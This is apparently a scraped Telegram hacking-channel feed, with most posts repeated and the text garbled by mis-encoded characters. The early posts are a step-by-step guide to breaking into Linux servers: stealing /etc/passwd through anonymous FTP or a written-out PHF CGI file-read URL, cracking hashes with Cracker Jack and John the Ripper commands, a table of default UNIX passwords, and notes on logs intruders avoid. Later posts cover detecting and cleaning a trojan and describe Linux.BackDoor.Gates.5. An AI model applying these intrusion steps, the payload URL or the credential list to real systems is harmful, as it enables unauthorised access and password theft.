β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 1 (plan)
>Crack the password
1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.
2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.
3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.
4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.
5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.
6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 1 (plan)
>Crack the password
1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.
2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.
3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.
4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.
5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.
6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 2 starting attack :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) getting the password file
is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not put it there for others to get it comfortably.
> can use john the ripper gd as well see next tutorial how to use it
2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods to you, you can try, it may succeed.
> 1.tc directory will not be locked on the FTP service. Intrusion can use the FTP client program to log in with an anonymously anonymous account, and then check if / etc / passwd is set to be read anonymously.
3) If there is a backup, use it immediately. Software decoding.
4) On some systems, there will be a file called PHF in the / cgi-bin directory. It will be more convenient if it is available on the server to be hacked. Because PHF allows users to remotely read files in the website system, based on this, users can use a browser to grab the psswd file, just type the URL in the browser address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the website to be hacked.
5) If neither of these methods work, the intruder must implement other methods.
> In some cases, the second part of the password file found by the intruder is X,!, Or *, then the password file is locked, which is one of the methods used by system administrators to strengthen security.
6) However, it is rare that the password file is completely hidden. Under normal circumstances, an unlocked password file is backed up in the system, so that intruders can use it.
> For example: the intruder usually looks for the / etc / shadow directory or a similar directory to see if a backup of the password file can be found .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 2 starting attack :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) getting the password file
is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not put it there for others to get it comfortably.
> can use john the ripper gd as well see next tutorial how to use it
2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods to you, you can try, it may succeed.
> 1.tc directory will not be locked on the FTP service. Intrusion can use the FTP client program to log in with an anonymously anonymous account, and then check if / etc / passwd is set to be read anonymously.
3) If there is a backup, use it immediately. Software decoding.
4) On some systems, there will be a file called PHF in the / cgi-bin directory. It will be more convenient if it is available on the server to be hacked. Because PHF allows users to remotely read files in the website system, based on this, users can use a browser to grab the psswd file, just type the URL in the browser address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the website to be hacked.
5) If neither of these methods work, the intruder must implement other methods.
> In some cases, the second part of the password file found by the intruder is X,!, Or *, then the password file is locked, which is one of the methods used by system administrators to strengthen security.
6) However, it is rare that the password file is completely hidden. Under normal circumstances, an unlocked password file is backed up in the system, so that intruders can use it.
> For example: the intruder usually looks for the / etc / shadow directory or a similar directory to see if a backup of the password file can be found .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Let s hack the linux server part 3:(after cracking the login pass)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Let s establish our own shell account
After two, three or two key steps, the intruder finally got the key password file, and cracked the password. Now you can run the TELNET program and log in to the host.
2) When connected to the server, the server will show you some information, usually U NIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms; then the Login prompt appears on the screen, then type You can log in to the system with the obtained account and password. At this point, the intruder can use his UNIX knowledge to do what he likes to do.
3) Finally, do an analysis of a password file, the file content is as follows:
root: 1234aaab: 0: 1: Operator: /: / bin / csh
nobody: *: 12345: 12345 :: /:
daemon: *: 1: 1: : /:
sys: *: 2: 2 :: /: / bin / csh
sun: 123456hhh: 0: 1: Operator: /: / bin / csh
bin: *: 3: 3 :: / bin:
uucp: *: 4: 8 :: / var / spool / uucppublic:
news: *: 6: 6 :: / var / spool / news: / bin / csh
audit: *: 9: 9 :: / etc / security / audit: / bin / csh
sync :: 1: 1 :: /: / bin / sync
sysdiag: *: 0: 1: Old System
Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag: *: 0: 1: System
Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom: 456lll45uu: 100: 20 :: / home / tom : / bin / csh
john: 456fff76Sl: 101: 20: john: / home / john: / bin / csh
henry: AusTs45Yus: 102: 20: henry: / home / henry: / bin / csh
harry: SyduSrd5sY: 103: 20 : Harry: / Home / Harry: / bin / csh
Steven: GEs45Yds5Ry: 104: 20 is: Steven: / Home / Steven: / bin / csh
+ :: 0: 0 :::
4) wherein the ":" field is divided into several For example: tom: 456lll45uu: 100: 20: tomchang: / home / tom: / bin / csh The meaning is:
User Name: tom
Password: 456lll45uu
User No: 100
Group No: 20
Real Name: tom chang
Home Dir: / home / tom
Shell: / bin / csh
5) Readers can find the above password fields such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag, sundiag, etc. Yes *, which means that the passwords of these accounts are locked and cannot be used directly.
6) It is worth noting that many systems will have some default accounts and passwords after the first installation, which is convenient for speculative hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT PASSWORD
----------- ----------------
root root
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot for "command login" use
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
7) where root mountfsys umountfsys install (sometimes also sync) is a root-level account, that is, it has sysop (system administrator) permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Let s hack the linux server part 3:(after cracking the login pass)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Let s establish our own shell account
After two, three or two key steps, the intruder finally got the key password file, and cracked the password. Now you can run the TELNET program and log in to the host.
2) When connected to the server, the server will show you some information, usually U NIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms; then the Login prompt appears on the screen, then type You can log in to the system with the obtained account and password. At this point, the intruder can use his UNIX knowledge to do what he likes to do.
3) Finally, do an analysis of a password file, the file content is as follows:
root: 1234aaab: 0: 1: Operator: /: / bin / csh
nobody: *: 12345: 12345 :: /:
daemon: *: 1: 1: : /:
sys: *: 2: 2 :: /: / bin / csh
sun: 123456hhh: 0: 1: Operator: /: / bin / csh
bin: *: 3: 3 :: / bin:
uucp: *: 4: 8 :: / var / spool / uucppublic:
news: *: 6: 6 :: / var / spool / news: / bin / csh
audit: *: 9: 9 :: / etc / security / audit: / bin / csh
sync :: 1: 1 :: /: / bin / sync
sysdiag: *: 0: 1: Old System
Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag: *: 0: 1: System
Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom: 456lll45uu: 100: 20 :: / home / tom : / bin / csh
john: 456fff76Sl: 101: 20: john: / home / john: / bin / csh
henry: AusTs45Yus: 102: 20: henry: / home / henry: / bin / csh
harry: SyduSrd5sY: 103: 20 : Harry: / Home / Harry: / bin / csh
Steven: GEs45Yds5Ry: 104: 20 is: Steven: / Home / Steven: / bin / csh
+ :: 0: 0 :::
4) wherein the ":" field is divided into several For example: tom: 456lll45uu: 100: 20: tomchang: / home / tom: / bin / csh The meaning is:
User Name: tom
Password: 456lll45uu
User No: 100
Group No: 20
Real Name: tom chang
Home Dir: / home / tom
Shell: / bin / csh
5) Readers can find the above password fields such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag, sundiag, etc. Yes *, which means that the passwords of these accounts are locked and cannot be used directly.
6) It is worth noting that many systems will have some default accounts and passwords after the first installation, which is convenient for speculative hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT PASSWORD
----------- ----------------
root root
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot for "command login" use
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
7) where root mountfsys umountfsys install (sometimes also sync) is a root-level account, that is, it has sysop (system administrator) permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now After Cracking A linux server wanna analyse The log file :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) it is necessary to introduce the UNIX log files. Many intruders don't want hacked computers to track them, how do they do that.
2) The system administrator mainly relies on the system's LOG, which is often called the log file, to obtain the traces of the intrusion and the IP and other information of the intruder. Of course, some administrators use third-party tools to record information about intruding into a computer. Here we mainly talk about files that record intrusion traces in general U NIX systems.
3) There are several versions of UNIX systems, each system has different LOG files, but most should have about the same storage location, the most common location is the following several:
/ usr / adm, earlier versions of UNIX;
/ var / adm, newer versions use this location;
/ var / log, some versions of Solaris, Linux BSD, Free BSD use this location;
/ etc, most UNIX versions put utmp here, some also put wtmp here This is also the location of syslog.conf.
4) The functions of some files are listed below, of course, they also differ according to different invaded systems.
> acct or pacct, which records the command records used by each user;
access_log, which is mainly used to run NCSA HTTPD on the server, what sites in this log file will connect to your server
aculog, which holds the MODEMS record you dialed out;
lastlog, which records the user's recent login record and the initial destination of each user, sometimes the last unsuccessful login;
loginlog, which records some abnormal login records;
messages , Record the output output to the system console, and other information is generated by syslog;
security, record some cases of using the UUCP system to attempt to enter the restricted range;
>sulog, record the record using the su command;
utmp, record the current login to the system For all users, this file changes constantly as the user enters and leaves the system;
utmpx, an extension of UTMP;
wtmp, records user login and logout events;
syslog, the most important log file, is obtained using the syslogd daemon.
π¦ Log information:
1) / dev / log, a UNIX domain socket that accepts messages generated by processes running on the local machine;
2) / dev / klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket , Accepting syslog messages generated by other machines via UDP;
3) Uucp, the recorded UUCP information, can be updated by local UUCP activities, and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, sender , Sending time and sending host;
4) lpd-errs, a log that handles printer fault information;
ftp log, you can obtain the recording function by executing ftpd with the -l option;
httpd log, HTTPD server records each web access record in the log;
History log, this file keeps a record of the user's recent input commands;
vold.log, records errors encountered when using external media.
5) The above introduces the main steps of hacking the server, and the reader should now have some basic knowledge about it. It needs to be emphasized again that if the reader lacks knowledge of the UNIX system, it is absolutely impossible to master it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now After Cracking A linux server wanna analyse The log file :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) it is necessary to introduce the UNIX log files. Many intruders don't want hacked computers to track them, how do they do that.
2) The system administrator mainly relies on the system's LOG, which is often called the log file, to obtain the traces of the intrusion and the IP and other information of the intruder. Of course, some administrators use third-party tools to record information about intruding into a computer. Here we mainly talk about files that record intrusion traces in general U NIX systems.
3) There are several versions of UNIX systems, each system has different LOG files, but most should have about the same storage location, the most common location is the following several:
/ usr / adm, earlier versions of UNIX;
/ var / adm, newer versions use this location;
/ var / log, some versions of Solaris, Linux BSD, Free BSD use this location;
/ etc, most UNIX versions put utmp here, some also put wtmp here This is also the location of syslog.conf.
4) The functions of some files are listed below, of course, they also differ according to different invaded systems.
> acct or pacct, which records the command records used by each user;
access_log, which is mainly used to run NCSA HTTPD on the server, what sites in this log file will connect to your server
aculog, which holds the MODEMS record you dialed out;
lastlog, which records the user's recent login record and the initial destination of each user, sometimes the last unsuccessful login;
loginlog, which records some abnormal login records;
messages , Record the output output to the system console, and other information is generated by syslog;
security, record some cases of using the UUCP system to attempt to enter the restricted range;
>sulog, record the record using the su command;
utmp, record the current login to the system For all users, this file changes constantly as the user enters and leaves the system;
utmpx, an extension of UTMP;
wtmp, records user login and logout events;
syslog, the most important log file, is obtained using the syslogd daemon.
π¦ Log information:
1) / dev / log, a UNIX domain socket that accepts messages generated by processes running on the local machine;
2) / dev / klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket , Accepting syslog messages generated by other machines via UDP;
3) Uucp, the recorded UUCP information, can be updated by local UUCP activities, and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, sender , Sending time and sending host;
4) lpd-errs, a log that handles printer fault information;
ftp log, you can obtain the recording function by executing ftpd with the -l option;
httpd log, HTTPD server records each web access record in the log;
History log, this file keeps a record of the user's recent input commands;
vold.log, records errors encountered when using external media.
5) The above introduces the main steps of hacking the server, and the reader should now have some basic knowledge about it. It needs to be emphasized again that if the reader lacks knowledge of the UNIX system, it is absolutely impossible to master it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Use Johna The Ripper-Full :Crack anything with your windows -linux :
twitter.com/UndercOdeTC
1) Download https://www.openwall.com/john/ (official )
2) let s try on any windows 10
from cmd go to dir <folder name... >
3) run .\john.exe
4) This command below tells JtR to try βsimpleβ mode, then the default wordlists containing likely passwords, and then βincrementalβ mode.
.\john.exe passwordfile
5) choose your worldlist and run :
.\john.exe passwordfile βwordlist=βwordlist.txtβ
6) If you want to specify a cracking mode use the exact parameter for the mode.
.\john.exe --single passwordfile
.\john.exe --incremental passwordfile
7) adding rules to cracking mode :
.\john.exe --wordlist=βwordlist.txtβ --rules --passwordfile
8) to see results :
>.\john.exe βshow passwordfile
9) you wanna to see if you cracked any root users (UID=0) use the βusers parameter.
.\john.exe --show --users=0 passwordfile
10) Well You Can start Cracking Now
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Use Johna The Ripper-Full :Crack anything with your windows -linux :
twitter.com/UndercOdeTC
1) Download https://www.openwall.com/john/ (official )
2) let s try on any windows 10
from cmd go to dir <folder name... >
3) run .\john.exe
4) This command below tells JtR to try βsimpleβ mode, then the default wordlists containing likely passwords, and then βincrementalβ mode.
.\john.exe passwordfile
5) choose your worldlist and run :
.\john.exe passwordfile βwordlist=βwordlist.txtβ
6) If you want to specify a cracking mode use the exact parameter for the mode.
.\john.exe --single passwordfile
.\john.exe --incremental passwordfile
7) adding rules to cracking mode :
.\john.exe --wordlist=βwordlist.txtβ --rules --passwordfile
8) to see results :
>.\john.exe βshow passwordfile
9) you wanna to see if you cracked any root users (UID=0) use the βusers parameter.
.\john.exe --show --users=0 passwordfile
10) Well You Can start Cracking Now
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Well Done, After those Underc0de Tutorials You Are Able to crack any linux Os, To get controle or...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How To Know If Your Linux Is Hacked ?
The experience of a Linux server being hacked and deleted :I. Background full tutorial :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) In the evening, I saw a server running very high traffic, which is obviously not the same as usual. The traffic reached 800Mbps. The first impression should be a Trojan horse, and it was being treated as a broiler.
2) For the best performance of our server, the firewall (iptables) is not turned on, but there is a physical firewall in front of the server, and the machine is doing port mapping, which is not a common port. It should be fully secure in theory Recently got involved with the Trojan. It always keeps me coming. I also take this opportunity to record the discovery process.
3) Find and track
a) View the traffic graph and find the problem
The web page is very stuck when viewed, and sometimes it doesn't even respond.
b) top dynamic view process
I immediately remotely logged in to the server with the problem. The remote operation was very stuck. The traffic from the network card was very large. I found an abnormal process through top that took up a lot of resources. I did nβt look at the name and thought it was a Web service process.
c) ps command to view the path of the process
I found this program file under the / etc directory, which is a binary program. I copied it and put it near this article for everyone to study on the virtual machine, haha.
d) End the abnormal process and continue tracking
killall -9 nginx1
rm -f / etc / nginx1
After killing the process, the traffic immediately came down, and the remote was not blocked. Do you delete the program file and kill the abnormal process? Do we think that the processing is complete? It is certainly not that simple to think about it. This is a Trojan. Generate the program file by ourselves (as expected, I did generate it later before I figured it out), we have to continue to track down.
e) View login records and log files secure
Run the command last to view the account login records. Everything is normal. Checking the system file message did not find anything, but when I checked the secure file, I found that there were some abnormalities. It was related to authentication anyway. Should I try to connect to control the packet sending?
f) ps check the process again
In fact, there was this problem during the first ps. At that time, it was not found. The second time was to study each process by self-study. The self-study looked for a less normal process and found a strange ps process.
g) I found a normal machine and checked the size of the ps command. The normal size is about 81KB. Then the ps on this machine is as high as 1.2M. The command file must be replaced.
h) Then I went into the directory of another ps and saw the following commands. Then I checked these commands of the system and found that they all became very large, all reached 1.2M. These system command files must be all Replaced.
π¦ 1) More abnormal files found
Looking at the crontab of the timed task file, I didn't find anything. Then I looked at the system startup file rc.local, and there was nothing abnormal. Then I went into the /etc/init.d directory to see the strange script files DbSecuritySpt, selinux.
2) The first file can be seen that he started the abnormal file. The second one should be related to the login. I don't know the specifics anyway, there must be a problem anyway.
3) Since it is related to login, then find the one related to ssh. I found the following file, which is a hidden file. This is also a Trojan file. Let's record it first, so that the program names are very similar to our service name. Both of them are 1.2M in size and they may be a file.
4) I took a look at the directory / tmp that the Trojan likes to appear, and also found abnormal files. From the name, I felt like I was monitoring the Trojan horse program-
π¦How To Know If Your Linux Is Hacked ?
The experience of a Linux server being hacked and deleted :I. Background full tutorial :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) In the evening, I saw a server running very high traffic, which is obviously not the same as usual. The traffic reached 800Mbps. The first impression should be a Trojan horse, and it was being treated as a broiler.
2) For the best performance of our server, the firewall (iptables) is not turned on, but there is a physical firewall in front of the server, and the machine is doing port mapping, which is not a common port. It should be fully secure in theory Recently got involved with the Trojan. It always keeps me coming. I also take this opportunity to record the discovery process.
3) Find and track
a) View the traffic graph and find the problem
The web page is very stuck when viewed, and sometimes it doesn't even respond.
b) top dynamic view process
I immediately remotely logged in to the server with the problem. The remote operation was very stuck. The traffic from the network card was very large. I found an abnormal process through top that took up a lot of resources. I did nβt look at the name and thought it was a Web service process.
c) ps command to view the path of the process
I found this program file under the / etc directory, which is a binary program. I copied it and put it near this article for everyone to study on the virtual machine, haha.
d) End the abnormal process and continue tracking
killall -9 nginx1
rm -f / etc / nginx1
After killing the process, the traffic immediately came down, and the remote was not blocked. Do you delete the program file and kill the abnormal process? Do we think that the processing is complete? It is certainly not that simple to think about it. This is a Trojan. Generate the program file by ourselves (as expected, I did generate it later before I figured it out), we have to continue to track down.
e) View login records and log files secure
Run the command last to view the account login records. Everything is normal. Checking the system file message did not find anything, but when I checked the secure file, I found that there were some abnormalities. It was related to authentication anyway. Should I try to connect to control the packet sending?
f) ps check the process again
In fact, there was this problem during the first ps. At that time, it was not found. The second time was to study each process by self-study. The self-study looked for a less normal process and found a strange ps process.
g) I found a normal machine and checked the size of the ps command. The normal size is about 81KB. Then the ps on this machine is as high as 1.2M. The command file must be replaced.
h) Then I went into the directory of another ps and saw the following commands. Then I checked these commands of the system and found that they all became very large, all reached 1.2M. These system command files must be all Replaced.
π¦ 1) More abnormal files found
Looking at the crontab of the timed task file, I didn't find anything. Then I looked at the system startup file rc.local, and there was nothing abnormal. Then I went into the /etc/init.d directory to see the strange script files DbSecuritySpt, selinux.
2) The first file can be seen that he started the abnormal file. The second one should be related to the login. I don't know the specifics anyway, there must be a problem anyway.
3) Since it is related to login, then find the one related to ssh. I found the following file, which is a hidden file. This is also a Trojan file. Let's record it first, so that the program names are very similar to our service name. Both of them are 1.2M in size and they may be a file.
4) I took a look at the directory / tmp that the Trojan likes to appear, and also found abnormal files. From the name, I felt like I was monitoring the Trojan horse program-
5) Thinking of this, there should be a lot of replacement commands. We can't solve it by relying on us alone. My suggestion is to reinstall the operating system and make good security policies.
> the Trojan manually clear
π¦ The general steps are summarized as follows:
1) Simple judgment of Trojan horse
2) Upload the following command to / root
ps netstat ss lsof
3) Delete the following directories and files
4) Find out abnormal programs and kill
5) Remove the command containing Trojan and reinstall (or copy the normal program uploaded in the past)
It seems that reinstalling by myself doesn't work. I am looking for a normal machine copy command.
π¦ antivirus tools scan
1) Install the anti-virus tool clamav
2) Start the service
service clamd restart
3) Update the virus database
Since ClamAV is not the latest version, there is an alert message. You can ignore or upgrade the latest version.
4) Scanning method
You can use clamscan -h to view the corresponding help information
5) check the log and find
Delete the found command and replace the normal one
> Appendix: Linux.BackDoor.Gates.5
After querying the information, this Trojan should be Linux.BackDoor.Gates.5, find a file, the content is as follows:
6) Some users have a deep-rooted concept that there is no malware that can actually threaten the Linux kernel operating system, but this concept is facing increasing challenges.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
> the Trojan manually clear
π¦ The general steps are summarized as follows:
1) Simple judgment of Trojan horse
2) Upload the following command to / root
ps netstat ss lsof
3) Delete the following directories and files
4) Find out abnormal programs and kill
5) Remove the command containing Trojan and reinstall (or copy the normal program uploaded in the past)
It seems that reinstalling by myself doesn't work. I am looking for a normal machine copy command.
π¦ antivirus tools scan
1) Install the anti-virus tool clamav
2) Start the service
service clamd restart
3) Update the virus database
Since ClamAV is not the latest version, there is an alert message. You can ignore or upgrade the latest version.
4) Scanning method
You can use clamscan -h to view the corresponding help information
5) check the log and find
Delete the found command and replace the normal one
> Appendix: Linux.BackDoor.Gates.5
After querying the information, this Trojan should be Linux.BackDoor.Gates.5, find a file, the content is as follows:
6) Some users have a deep-rooted concept that there is no malware that can actually threaten the Linux kernel operating system, but this concept is facing increasing challenges.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦When Exactly locate the torgan process ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Described here is a Trojan in the malware family Linux.BackDoor.Gates: Linux.BackDoor.Gates.5.
2) This malware combines the functionality of traditional backdoors and DDoS attack Trojans to infect 32-bit Linux versions. Its characteristics can be concluded that it belongs to the same virus writer as the Linux.DnsAmp and Linux.DDoS family Trojans.
3) The new Trojan consists of two functional modules: the basic module is a backdoor program capable of executing instructions issued by the criminals, and the second module is saved to the hard disk during the installation process for DDoS attacks. Linux.BackDoor.Gates.5 collects and forwards the following information of the infected computer to the criminals during the operation:
> Number of CPU cores (read from / proc / cpuinfo).
CPU speed (read from / proc / cpuinfo).
CPU usage (read from / proc / stat).
Gate'a's IP (read from / proc / net / route).
Gate'a's MAC address (read from / proc / net / arp).
Network interface information (read from / proc / net / dev).
MAC address of the network device.
Memory (using the MemTotal parameter in / proc / meminfo).
The amount of data sent and received (read from / proc / net / dev).
Operating system name and version (by calling the uname command).
After booting, Linux.BackDoor.Gates.5 checks the path of its startup folder and implements four behavior modes based on the results of the check.
π¦If the path of the backdoor program's executable file is inconsistent with the path of the netstat, lsof, and ps tools, the Trojan will pretend to be a daemon to start in the system, then initialize it, and decompress the configuration file during the initialization process. The configuration file contains various data necessary for the Trojan to run, such as the management server IP address and port, and backdoor program installation parameters.
> According to the g_iGatsIsFx parameter value in the configuration file, the Trojan may actively connect to the management server or wait for a connection: After successful installation, the backdoor program will detect the IP address of the site it is connected to, and then use the site as a command server.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦When Exactly locate the torgan process ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Described here is a Trojan in the malware family Linux.BackDoor.Gates: Linux.BackDoor.Gates.5.
2) This malware combines the functionality of traditional backdoors and DDoS attack Trojans to infect 32-bit Linux versions. Its characteristics can be concluded that it belongs to the same virus writer as the Linux.DnsAmp and Linux.DDoS family Trojans.
3) The new Trojan consists of two functional modules: the basic module is a backdoor program capable of executing instructions issued by the criminals, and the second module is saved to the hard disk during the installation process for DDoS attacks. Linux.BackDoor.Gates.5 collects and forwards the following information of the infected computer to the criminals during the operation:
> Number of CPU cores (read from / proc / cpuinfo).
CPU speed (read from / proc / cpuinfo).
CPU usage (read from / proc / stat).
Gate'a's IP (read from / proc / net / route).
Gate'a's MAC address (read from / proc / net / arp).
Network interface information (read from / proc / net / dev).
MAC address of the network device.
Memory (using the MemTotal parameter in / proc / meminfo).
The amount of data sent and received (read from / proc / net / dev).
Operating system name and version (by calling the uname command).
After booting, Linux.BackDoor.Gates.5 checks the path of its startup folder and implements four behavior modes based on the results of the check.
π¦If the path of the backdoor program's executable file is inconsistent with the path of the netstat, lsof, and ps tools, the Trojan will pretend to be a daemon to start in the system, then initialize it, and decompress the configuration file during the initialization process. The configuration file contains various data necessary for the Trojan to run, such as the management server IP address and port, and backdoor program installation parameters.
> According to the g_iGatsIsFx parameter value in the configuration file, the Trojan may actively connect to the management server or wait for a connection: After successful installation, the backdoor program will detect the IP address of the site it is connected to, and then use the site as a command server.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Torgan Process In Any Linux (80% same Android)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) During the installation process, the Trojan checks the file /tmp/moni.lock. If the file is not empty, it reads the data (PID process) and "kills" the ID process.
2) Then Linux.BackDoor.Gates.5 will check whether the DDoS module and backdoor own processes are started in the system (if they are started, these processes will also be "killed"). If a special flag g_iIsService is set in the configuration file, the Trojan sets itself as self-starting by writing the command line #! / Bin / bash \ n <path_to_backdoor> in the file /etc/init.d/, and then Linux.BackDoor. Gates.5 creates the following symbolic links:
3) If the flag g_bDoBackdoor is set in the configuration file, the Trojan will also try to open the /root/.profile file and check if its process has root permissions. The backdoor then copies itself into / usr / bin / bsd-port / getty and starts. In the final stage of the installation, Linux.BackDoor.Gates.5 creates another copy in the folder / usr / bin /, names it the corresponding name set in the configuration file, and replaces the following tools:
/ bin / netstat
/ bin / lsof
/ bin / ps
/ usr / bin / netstat
/ usr / bin / lsof
/ usr / bin / ps
/ usr / sbin / netstat
/ usr / sbin / lsof
/ usr / sbin / ps
4) The Trojan completes the installation with this and starts calling basic functions.
5) When executing the other two algorithms, the Trojan will also pretend to be a daemon and start on the infected computer. Check whether its components are started by reading the corresponding .lock file (if it is not started, start the component), but it will start automatically after saving the file and registering When using a different name.
6) After setting up a connection with the command server, Linux.BackDoor.Gates.5 receives configuration data from the server and commands that the bot needs to complete. According to the instructions of the criminals, the Trojan can automatically update, launch or stop DDoS attacks on remote sites with specified IP addresses and ports, execute commands contained in configuration data, or execute other commands by establishing connections with remote sites with specified IP addresses.
7) The main DDoS attack target of this backdoor program is random servers, however, the attackers also include other countries.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Torgan Process In Any Linux (80% same Android)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) During the installation process, the Trojan checks the file /tmp/moni.lock. If the file is not empty, it reads the data (PID process) and "kills" the ID process.
2) Then Linux.BackDoor.Gates.5 will check whether the DDoS module and backdoor own processes are started in the system (if they are started, these processes will also be "killed"). If a special flag g_iIsService is set in the configuration file, the Trojan sets itself as self-starting by writing the command line #! / Bin / bash \ n <path_to_backdoor> in the file /etc/init.d/, and then Linux.BackDoor. Gates.5 creates the following symbolic links:
3) If the flag g_bDoBackdoor is set in the configuration file, the Trojan will also try to open the /root/.profile file and check if its process has root permissions. The backdoor then copies itself into / usr / bin / bsd-port / getty and starts. In the final stage of the installation, Linux.BackDoor.Gates.5 creates another copy in the folder / usr / bin /, names it the corresponding name set in the configuration file, and replaces the following tools:
/ bin / netstat
/ bin / lsof
/ bin / ps
/ usr / bin / netstat
/ usr / bin / lsof
/ usr / bin / ps
/ usr / sbin / netstat
/ usr / sbin / lsof
/ usr / sbin / ps
4) The Trojan completes the installation with this and starts calling basic functions.
5) When executing the other two algorithms, the Trojan will also pretend to be a daemon and start on the infected computer. Check whether its components are started by reading the corresponding .lock file (if it is not started, start the component), but it will start automatically after saving the file and registering When using a different name.
6) After setting up a connection with the command server, Linux.BackDoor.Gates.5 receives configuration data from the server and commands that the bot needs to complete. According to the instructions of the criminals, the Trojan can automatically update, launch or stop DDoS attacks on remote sites with specified IP addresses and ports, execute commands contained in configuration data, or execute other commands by establishing connections with remote sites with specified IP addresses.
7) The main DDoS attack target of this backdoor program is random servers, however, the attackers also include other countries.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
